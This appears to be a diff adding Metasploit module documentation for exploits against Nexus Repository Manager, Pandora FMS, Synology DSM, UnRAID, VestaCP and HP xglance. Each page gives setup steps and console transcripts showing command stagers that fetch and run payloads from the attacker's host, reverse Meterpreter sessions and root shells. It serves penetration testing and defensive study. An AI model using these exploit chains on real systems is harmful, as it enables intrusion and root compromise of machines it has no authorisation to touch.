+
+Open a browser and go to <http://localhost:8081/>. If you're greeted by
+the Nexus page, then the application has started successfully.
+
+#### Changing the admin user's password
+
+Run `docker exec nexus cat /nexus-data/admin.password` to get the admin
+password. Sign in as the `admin` user with the password you just
+retrieved.
+
+Follow the prompts in the wizard. Change the password to something you
+can remember. You can click through the anonymous access question, since
+it's not relevant to the exploit. You don't need to enable the feature.
+
+If you have trouble getting the password change to stick, wait a couple
+minutes or browse to <http://localhost:8081/#user/account> and change it
+again.
+
+#### Adding an unprivileged user
+
+1. Browse to <http://localhost:8081/#admin/security/users>
+2. Click `Create local user` on the current page
+3. Fill in all the required fields
+  * You can set a fake e-mail address like `user@example.com`
+  * Make sure you set a password you can remember, since you'll be using
+    it to test the module
+  * It is **critical** that you set the `Status` field to `Active` and
+    move the `nx-anonymous` role to the `Granted` column
+4. Click `Create local user` on the current page
+5. Sign out the `admin` account and test your new login
+
+After completing these steps, you may now test the module.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This targets Nexus Repository Manager versions <= 3.21.1.
+
+## Options
+
+### USERNAME
+
+Set this to a valid Nexus username. It can be an unprivileged user, but
+it defaults to `admin` because that is a known account.
+
+### PASSWORD
+
+Set this to a valid Nexus password. No default, since the `admin` user's
+password is randomized on install.
+
+## Scenarios
+
+### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
+
+```
+msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > options
+
+Module options (exploit/linux/http/nexus_repo_manager_el_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    yes       Nexus password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8081             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Nexus username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nexus Repository Manager <= 3.21.1
+
+
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
+[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
+[*] Logging in with admin:admin
+[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
+[*] Using URL: http://0.0.0.0:8080/t6NXrxF
+[*] Local IP: http://192.168.1.3:8080/t6NXrxF
+[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
+[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
+[*] Sending payload to 192.168.1.3 (curl/7.61.1)
+[*] Command Stager progress -  50.00% done (54/108 bytes)
+[*] Executing command: chmod +x /tmp/hgzeytII
+[+] Successfully executed command: chmod +x /tmp/hgzeytII
+[*] Command Stager progress -  70.37% done (76/108 bytes)
+[*] Executing command: /tmp/hgzeytII
+[+] Successfully executed command: /tmp/hgzeytII
+[*] Command Stager progress -  82.41% done (89/108 bytes)
+[*] Executing command: rm -f /tmp/hgzeytII
+[+] Successfully executed command: rm -f /tmp/hgzeytII
+[*] Command Stager progress - 100.00% done (108/108 bytes)
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md

@@ -0,0 +1,77 @@
+## Vulnerable Application
+
+Pandora FMS (for Pandora Flexible Monitoring System) is software for
+monitoring computer networks. Pandora FMS allows monitoring in a visual
+way the status and performance of several parameters from different
+operating systems, servers, applications and hardware systems such
+as firewalls, proxies, databases, web servers or routers.
+
+This module exploits a vulnerability found in Pandora FMS 7.0 NG and lower.
+The vulnerability exists on the `net_tools.php` component, due to the insecure
+usage of the `system()` PHP function.
+
+This module has been tested with [Pandora FMS 7.0 NG](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/Final/Pandora_FMS_7.0_NG_VmWare_ovf.zip/download)
+
+## Verification Steps
+
+Launch metasploit and set the appropriate options:
+
+1.  Start `msfconsole`
+2. `use exploit/linux/http/pandora_ping_cmd_exec`
+3. `set RHOSTS <rhosts>`
+4. `set LHOST <lhost>`
+5. `set USERNAME <username>`
+6. `set PASSWORD <password>`
+7. `exploit`
+
+## Options
+
+  **USERNAME**
+
+  The username for Pandora FMS.
+
+  **PASSWORD**
+
+  The password for Pandora FMS.
+
+
+## Setup
+
+https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing
+
+## Scenarios
+
+ Tested Pandora FMS 7.0 NG on CentOS 7.3.1611
+
+```
+msf5 > use exploit/linux/http/pandora_ping_cmd_exec
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128
+RHOSTS => 192.168.215.128
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12
+RHOSTS => 192.168.1.12
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5
+LHOST => 192.168.1.5
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin
+USERNAME => admin
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora
+PASSWORD => pandora
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444
+[*] Exploiting...
+[*] Using URL: http://0.0.0.0:8080/ksdtisFA
+[*] Local IP: http://192.168.1.5:8080/ksdtisFA
+[*] Attempting to authenticate using (admin:pandora)
+[+] Successfully authenticated
+[*] Attempting to retrieve session cookie
+[+] Successfully retrieved session cookie: PHPSESSID=knoo75fs75l00ec74atu8ic3d0; clippy=deleted; clippy=deleted;
+[*] Client 192.168.1.12 (Wget/1.14 (linux-gnu)) requested /ksdtisFA
+[*] Sending payload to 192.168.1.12 (Wget/1.14 (linux-gnu))
+[*] Sending stage (989416 bytes) to 192.168.1.12
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.12:54784) at 2020-03-09 15:38:25 +0300
+
+[*] Command Stager progress - 131.25% done (147/112 bytes)
+[*] Server stopped.
+
+meterpreter >
+```

documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md

@@ -0,0 +1,203 @@
+## Vulnerable Application
+
+This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
+versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
+privileges after website authentication.
+
+The vulnerability is located in `webman/modules/StorageManager/smart.cgi`, which
+allows appending of a command to the device to be scanned.  However, the command
+with drive is limited to 30 characters.  A somewhat valid drive name is required,
+thus /dev/sd is used, even though it doesn't exist.  To circumvent the character
+restriction, a wget input file is staged in /a, and executed to download our payload
+to /b.  From there the payload is executed.  A wfsdelay is required to give time
+for the payload to download, and the execution of it to run.
+
+A more detailed explination of exploitation steps:
+
+1. We first clean the env by deleting `/a`, and `b`
+2. we use `echo -n` to append our IP:PORT for our staging server to `/a`.  This is
+done in small chunks to stay under the character limit.
+3. we call `wget -i /a -O b` to write our payload to `b` in `/usr/syno/synoman/webman/modules/StorageManager`
+4. we wait for HTTP Server to receive the `wget` request and send back the payload.  Then we execute it.
+
+### Notes
+
+`smart.cgi` and our payload are located in `/usr/syno/synoman/webman/modules/StorageManager`.
+
+`/var/log/messages` will contain logs of exploitation:
+
+```
+May 19 16:35:50 oldNas smart.cgi: smart.cpp:477 smartctl system command failed cmd: /usr/syno/bin/smartctl -d sat -t short /dev/sd`wget -i /a -O b` > /dev/null 2>&1 ret: 4
+May 19 16:35:50 oldNas smart.cgi: smart.cpp:846 error
+```
+
+No randomization was chosen on the `a` and `b` file names since we're so limited on characters as it is.
+While it would be possible to randomize a single character, it didn't seem worth the effort.
+
+### Device Downgrade
+
+The vulnerable DSM can be downloaded from [Synology](https://archive.synology.com/download/DSM/release/5.2/5644/)
+
+Essentially Synology doesn't want you to downgrade. In order to do so, we need to mount the recovery boot loader
+and overwrite it with synology 5.2.  Then when we cause an issue (by removing the disks on boot), it will boot
+to the recovery.  Since the recovery is 5.2, it will let us install the 'current' version of 5.2.
+
+You'll want to watch [Downgrade DSM6.x to DSM 5.2](https://youtube.com/watch?v=DFtOmEv63n4)
+
+The notes from the video are:
+
+1. Turn on synology and backup data if needed.
+2. Create a shared folder. ("test" is used in this guide)
+3. Locally, extract 4 files from DSM 5644.pat (grub_cksum.syno, rd.gz, zImage, checksum.syno)
+and place the files in the newly created shared folder on the NAS.
+4. Enable telnet/ssh in the DSM control panel.
+5. telnet/ssh to the diskstation.
+6. Log in as admin.
+7. Type `sudo su`. The password it asks for will also be the admins password.
+8. Type `cd /dev` to change to the devices directory.
+9. Type `ls synoboot2` to make sure synoboot2 is listed.
+10. Type `mkdir /mnt/synoboot` to make a directory to mount to.
+11. Type `mount synoboot2 /mnt/synoboot` to mount the boot files to the directory we created.
+12. Type `cd /mnt/synoboot` to change to that directory.
+13. Type `ls` to view the files in the directory.
+(note that the names of the 4 files we put in the shared folder, should be there.
+Although these ones listed are the DSM6 versions)
+14. Type `cp /volume1/test/checksum.syno /mnt/synoboot`.
+15. Type `cp /volume1/test/grub_cksum.syno /mnt/synoboot`.
+16. Type `cp /volume1/test/rd.gz /mnt/synoboot`.
+17. Type `cp /volume1/test/zImage /mnt/synoboot`.
+18. Go back into the DSM interface and shutdown. Once the device is shutdown, remove the disks.
+(This step is important because if you do not remove the disks,
+the next powerup will detect an issue and recover the DSM6 boot image)
+19. Power the device up. Should say no disks inserted.
+Before clicking the connect again button, put the hard disks back in and wait for the HDD LED's to light up.
+20. If disks are in, click the connect again button.
+Next page should come up saying to reinstall DSM.
+Make sure to choose the 5967 pat file so that the bootimage is overwritten correctly.
+21. Good to go! Data should remain intact as long as it is in a shared folder,
+and DSM should be a completely stock 5.2 - 5967.
+
+## Verification Steps
+
+  1. Install the 5.2 vulnerable DSM
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/synology_dsm_smart_exec_auth```
+  4. Do: ```set username <username>```
+  5. Do: ```set password <password>```
+  6. Do: ```run```
+  7. You should get a root shell.
+
+## Options
+
+### Password
+
+Password for website login.  Default is `password`.
+
+### Username
+
+Username for website login.  Default is `admin`.
+
+### wfsdelay
+
+Wfsdelay needs to be at least a couple seconds to allow for payload download and staging.  Default is `10`.
+
+## Scenarios
+
+### DS412+ with DSM 5.2-5644
+
+  ```
+  [*] Processing synology.rc for ERB directives.
+  resource (synology.rc)> use modules/exploits/linux/http/synology_dsm_smart_exec_auth
+  resource (synology.rc)> set payload python/meterpreter/reverse_tcp
+  payload => python/meterpreter/reverse_tcp
+  resource (synology.rc)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (synology.rc)> set lport 60111
+  lport => 60111
+  resource (synology.rc)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (synology.rc)> set srvhost 1.1.1.1
+  srvhost => 1.1.1.1
+  resource (synology.rc)> set username admin
+  username => admin
+  resource (synology.rc)> set password password
+  password => password
+  resource (synology.rc)> set verbose true
+  verbose => true
+  resource (synology.rc)> rexploit
+  [*] Reloading module...
+  [*] Started reverse TCP handler on 1.1.1.1:60111 
+  [*] Trying to detect installed version
+  [*] Model DS412+ with version 5.2-5644 detected
+  [*] Attempting Login
+  [*] Using URL: http://1.1.1.1:8080/
+  [*] Cleaning env
+  [*] Staging wget with: echo -n '1.1'>>/a
+  [*] Staging wget with: echo -n '.1.1:'>>/a
+  [*] Staging wget with: echo -n '8080'>>/a
+  [*] Requesting payload pull
+  [+] HTTP Server request received, sending payload
+  [*] Executing payload
+  [*] Sending stage (53755 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:60111 -> 2.2.2.2:42353) at 2020-05-19 20:13:33 -0400
+  [*] Server stopped.
+  [!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
+  [!] This exploit may require manual cleanup of '/a' on the target
+
+  meterpreter > 
+  [+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
+  [+] Deleted /a
+
+  meterpreter > getuid
+  Server username: root
+  meterpreter > sysinfo
+  Computer     : oldNas
+  OS           : Linux 3.10.35 #5644 SMP Thu Nov 12 17:18:22 CST 2015
+  Architecture : x64
+  Meterpreter  : python/linux
+  meterpreter > cat /etc.defaults/VERSION
+  majorversion="5"
+  minorversion="2"
+  buildphase="hotfix"
+  buildnumber="5644"
+  smallfixnumber="0"
+  builddate="2015/11/12"
+  buildtime="17:17:21"
+  meterpreter > 
+  ```
+
+### DS410 with DSM 5.2-5644
+
+This unit's version was not able to be determined automatically.  `forceexploit` was set to `true` to enable it to run.
+
+```
+msf5 exploit(linux/http/synology_dsm_smart_exec_auth) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4567 
+[*] Trying to detect installed version
+[*] Attempting Login
+[*] Using URL: http://192.168.135.168:8080/
+[*] Cleaning env
+[*] Staging wget with: echo -n '192.168'>>/a
+[*] Staging wget with: echo -n '.135.16'>>/a
+[*] Staging wget with: echo -n '8:8080'>>/a
+[*] Requesting payload pull
+[+] HTTP Server request received, sending payload
+[*] Executing payload
+[*] Sending stage (53755 bytes) to 192.168.132.107
+[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.132.107:54951) at 2020-05-20 13:53:18 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
+[!] This exploit may require manual cleanup of '/a' on the target
+
+meterpreter > 
+[+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
+[+] Deleted /a
+
+meterpreter > sysinfo
+Computer     : DiskStation
+OS           : Linux 2.6.32.12 #5644 Thu Nov 12 17:17:40 CST 2015
+Architecture : ppc
+Meterpreter  : python/linux
+meterpreter > exit
+```

documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md

@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.
+
+### Description
+
+This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
+performs remote code execution as root by abusing the *extract* function used in the `template.php` file.
+
+### Testing Environment
+
+Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
+according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.
+
+## Verification Steps
+
+  1. Setup UnRAID 6.8.0
+  2. Start `msfconsole`
+  3. `use exploit/linux/http/unraid_auth_bypass_exec`
+  4. `set RHOST [UNRAID]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+## Options
+
+  **TARGETURI** : The URI of the Unraid application
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
+msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
+RHOSTS => 10.10.0.173
+msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
+[*] 10.10.0.173:80 - The target appears to be vulnerable.
+msf5 exploit(linux/http/unraid_auth_bypass_exec) > run
+
+[*] Started reverse TCP handler on 10.10.0.161:4444 
+[*] Sending stage (38288 bytes) to 10.10.0.173
+[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
+[+] Request timed out, OK if running a non-forking/blocking payload...
+
+meterpreter > getuid
+Server username: root (0)
+```

documentation/modules/exploit/linux/http/vestacp_exec.md

@@ -0,0 +1,120 @@
+## Vulnerable Application
+This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user.
+
+To exploit this vulnerability, an authenticated attacker with low privileges can request VestaCP backup a file whose file name starts with a '.', followed by the ';' character to escape the current command, and finally the command they wish to execute. During the user backup process, this file name will be evaluated by the v-backup-user bash script, which will not perform appropriate input validation prior to passing this file name to an eval() call. As result, when an attacker tries to list existing backups the injected command will be executed by the v-backup-user bash script and will result in the attacker's injected command being executed as the root user.
+
+## Installing the Vulnerable Application on Ubuntu 18.03 LTS
+
+You can install Vesta Control Panel on Ubuntu 18.04 LTS server with the following commands:
+
+```
+ssh root@your.server
+curl -O http://vestacp.com/pub/vst-install.sh
+bash vst-install.sh
+```
+
+Once you have finished the installation, perform the following actions in order to create a unprivileged user:
+
+1 - Go to https://*IP ADDR*:8083/
+
+2 - Login with your administrator account.
+
+3 - Click on the "User" section under the top navigation menu. When you move your mouse over the text for
+the "User" section, it will turn orange. This is the link that you need to click!
+
+4 - The URL in your browser should now be https://*IP ADDR*:8083/list/user/
+
+5 - Click on the green plus sign on the left side of the page. When you move your mouse
+over this button, it will say "ADD USER".
+
+6 - In the following user creation form that appears, enter values for the "user", "password", "email", "first name",
+and "last name" fields. Leave package and language options as is, as these fields do not affect exploitation.
+
+7 - Log out of your admin account.
+
+8 - Browse to https://*IP ADDR*:8083/
+
+9 - Verify that the new low privileged user has been created and that you can log in using their credentials.
+
+
+
+## Verification Steps
+
+A successful check of the exploit will look similar to the output shown below:
+
+1. Start `msfconsole`
+2. `use exploit/linux/http/vestacp_exec`
+3. Set `RHOST`
+4. Set `LHOST`
+4. Set `USERNAME`
+4. Set `PASSWORD`
+4. Set `SRVHOST`
+4. Set `SRVPORT`
+7. Run `exploit`
+8. **Verify** that you are seeing `Successfully authenticated to the FTP service` in the console.
+9. **Verify** that you are seeing `Successfully uploaded the payload as a file name` in the console.
+9. **Verify** that you are seeing `Successfully authenticated to the HTTP Service` in the console.
+9. **Verify** that you are seeing `Scheduled backup has ben started. Exploitation may take up to 5 minutes.` in the console.
+9. **Verify** that you are seeing `It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...` in the console.
+9. **Verify** that you are seeing `First stage is executed ! Sending 2nd stage of the payload` in the console.
+15. **Verify** that you are getting a Meterpreter session.
+
+## Ubuntu 18.04 LTS with VestaCP 0.9.26
+
+```
+msf5 > use exploit/linux/http/vestacp_exec
+msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
+RHOSTS => 192.168.74.218
+msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
+USERNAME => user11
+msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
+PASSWORD => qwe123
+msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1
+LHOST => 192.168.74.1
+msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1
+SRVHOST => 192.168.74.1
+msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
+SRVPORT => 8081
+msf5 exploit(linux/http/vestacp_exec) > run
+[*] Exploit running as background job 32.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.74.1:4444
+[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
+msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
+[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
+[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
+[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
+[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
+[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
+[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
+[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
+[+] 192.168.74.218:8083 - Scheduled backup has been started !
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
+[*] Sending stage (53755 bytes) to 192.168.74.218
+[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300
+
+msf5 exploit(linux/http/vestacp_exec) > sessions -i 8
+[*] Starting interaction with 8...
+
+meterpreter > shell
+Process 42978 created.
+Channel 1 created.
+/bin/sh: 0: can't access tty; job control turned off
+# id
+uid=0(root) gid=0(root) groups=0(root)
+meterpreter > shell
+[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3
+
+#
+```

documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md

@@ -0,0 +1,232 @@
+## Vulnerable Application
+
+
+This exploit takes advantage of xglance-bin, part of
+HP's Glance (or Performance Monitoring) version 11 'and subsequent',
+which was compiled with an insecure RPATH option.  The RPATH includes
+a relative path to -L/lib64/ which can be controlled by a user.
+Creating libraries in this location will result in an
+escalation of privileges to root.
+
+### Mock Application
+
+Unfortunately the application is a pay for application and the version is many years old by the time the
+PoC was released.  Instead, we use a mock binary based on the permissions noted in the original CVE
+announcement, and the `ldd` details from the PoC.
+
+The following commands were performed on Fedora 31 to create the binary.
+When the binary was pushed to rhel7.1 for testing, a 'of size' libXm.so.4 was required
+so ```cp /lib64/libffi.so.6 ./-L/lib64/libXm.so.4``` was enough to make the binary
+vulnerable.
+
+    ```
+    sudo su
+    cd ~
+    dnf install motif-devel
+    
+    cat > main.c << DONE
+    #include <stdio.h>
+    #include <Xm/Xm.h>
+    
+    void main(){
+        printf("HP xglance-bin emulator %d\n",XmVERSION);
+        char* x = XmCvtXmStringToCT(NULL);
+        printf("%p",x);
+    }
+    
+    DONE
+    
+    
+    mkdir -p ./-L/lib64;
+    cd ./-L/lib64;
+    ```
+The follow commands copies files to the path for building.
+However, they may not be installed on a default rhel system.
+
+    ```
+    # libXm.so.3 may fail on newer systems like fedora 31
+    cp /usr/lib64/libXm.so.3 .;
+    cp /usr/lib64/libXm.so.4 libXm.so.3;
+    cp /usr/lib64/libXp.so.6 .;
+    cp /usr/lib64/libXt.so.6 .;
+    cd ../..;
+    ```
+    gcc -lXm main.c -o xglance-bin -Wl,-rpath=-L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64;
+    mkdir -p /opt/perf/bin/;
+    cp xglance-bin /opt/perf/bin/;
+    chown root:bin /opt/perf/bin/xglance-bin;
+    chmod 4555 /opt/perf/bin/xglance-bin;
+    ```
+
+To confirm the file is vulnerable, run:
+    ```
+    [fedora@fedora31 ~]$ ldd /opt/perf/bin/xglance-bin | grep -- -L/lib64/
+            libXt.so.6 => -L/lib64/libXt.so.6 (0x00007f727441b000)
+            libXp.so.6 => -L/lib64/libXp.so.6 (0x00007f72742b2000)
+    ```
+We'll want to see one or more `libX*.so*` files with `-L/lib64/`.
+
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Get a session
+  4. Do: ```use exploit/linux/local/hp_xglance_priv_esc```
+  5. Do: ```set session #```
+  6. Do: ```run```
+  7. You should get a root shell.
+ 
+## Options
+
+### COMPILE
+
+If the .so exploit should be compiled on the system.  `gcc` is required.
+More noisey, but more AV resilient. Default is `true`.
+
+### GLANCE_PATH
+
+Path to the `xglance-bin` executable.  Default is `/opt/perf/bin/xglance-bin`.
+
+## Scenarios
+
+### Mock binary on Fedora 31 with compile
+
+    ```
+    [*] Processing xglance.rb for ERB directives.
+    resource (xglance.rb)> use auxiliary/scanner/ssh/ssh_login
+    resource (xglance.rb)> set rhosts 2.2.2.2
+    rhosts => 2.2.2.2
+    resource (xglance.rb)> set username fedora
+    username => fedora
+    resource (xglance.rb)> set password fedora
+    password => fedora
+    resource (xglance.rb)> run
+    [+] 2.2.2.2:22 - Success: 'fedora:fedora' ''
+    [*] Command shell session 1 opened (1.1.1.1:34379 -> 2.2.2.2:22) at 2020-04-19 14:39:45 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+    ```
+    ```
+    resource (xglance.rb)> use exploit/linux/local/hp_xglance_priv_esc
+    resource (xglance.rb)> set session -1
+    session => -1
+    resource (xglance.rb)> set verbose true
+    verbose => true
+    resource (xglance.rb)> rexploit
+    [*] Reloading module...
+    [!] SESSION may not be compatible with this module.
+    [*] Started reverse TCP handler on 1.1.1.1:4444
+    [+] xglance-bin found, and linked to vulnerable relative path -L/lib64/ through libXt.so.6
+    [*] Deleting exploit folder: /tmp/-L
+    [*] Creating exploit folder: /tmp/-L/lib64/
+    [+] gcc is installed
+    [*] Live compiling exploit on system...
+    [*] Max line length is 65537
+    [*] Writing 106298 bytes in 7 chunks of 61359 bytes (octal-encoded), using printf
+    [*] Next chunk is 61584 bytes
+    [*] Next chunk is 60411 bytes
+    [*] Next chunk is 61525 bytes
+    [*] Next chunk is 61438 bytes
+    [*] Next chunk is 61757 bytes
+    [*] Next chunk is 30375 bytes
+    [*] uploading payload
+    [*] Writing '/tmp/.u4aLoiq' (207 bytes) ...
+    [*] Max line length is 65537
+    [*] Writing 207 bytes in 1 chunks of 630 bytes (octal-encoded), using printf
+    [*] Launching xglance-bin...
+    [*] Transmitting intermediate stager...(106 bytes)
+    [*] Sending stage (980808 bytes) to 2.2.2.2
+    [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55298) at 2020-04-19 14:40:05 -0400
+    
+    meterpreter > getuid
+    Server username: no-user @ fedora31 (uid=0, gid=1000, euid=0, egid=1000)
+    meterpreter > shell
+    Process 1699 created.
+    Channel 1 created.
+    whoami
+    root
+    ^Z
+    Background channel 1? [y/N]  y
+    meterpreter > sysinfo
+    Computer     : 2.2.2.2
+    OS           : Fedora 31 (Linux 5.3.7-301.fc31.x86_64)
+    Architecture : x64
+    BuildTuple   : i486-linux-musl
+    Meterpreter  : x86/linux
+    meterpreter > 
+    ```
+
+### Mock binary on rhel 7.1 no compile
+
+    ```
+    [*] Processing xglance.rb for ERB directives.
+    resource (xglance.rb)> use auxiliary/scanner/ssh/ssh_login
+    resource (xglance.rb)> set rhosts 2.2.2.2
+    rhosts => 2.2.2.2
+    resource (xglance.rb)> set username redhat
+    username => redhat
+    resource (xglance.rb)> set password redhat
+    password => redhat
+    resource (xglance.rb)> run
+    [+] 2.2.2.2:22 - Success: 'redhat:redhat' ''
+    [*] Command shell session 1 opened (1.1.1.1:45901 -> 2.2.2.2:22) at 2020-04-19 14:59:53 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+    ```
+    ```
+    msf5 exploit(linux/local/hp_xglance_priv_esc) > rexploit
+    [*] Reloading module...
+
+    [!] SESSION may not be compatible with this module.
+    [*] Started reverse TCP handler on 1.1.1.1:4444 
+    [+] xglance-bin found, and linked to vulnerable relative path -L/lib64/ through libXm.so.4
+    [*] Deleting exploit folder: /tmp/-L
+    [*] Creating exploit folder: /tmp/-L/lib64/
+    [*] Dropping pre-compiled exploit on system...
+    [*] Writing '/tmp/-L/lib64/libXm.so.3' (368248 bytes) ...
+    [*] Max line length is 65537
+    [*] Writing 368248 bytes in 23 chunks of 46385 bytes (octal-encoded), using printf
+    [*] Next chunk is 53790 bytes
+    [*] Next chunk is 38675 bytes
+    [*] Next chunk is 38759 bytes
+    [*] Next chunk is 38694 bytes
+    [*] Next chunk is 38757 bytes
+    [*] Next chunk is 38658 bytes
+    [*] Next chunk is 63466 bytes
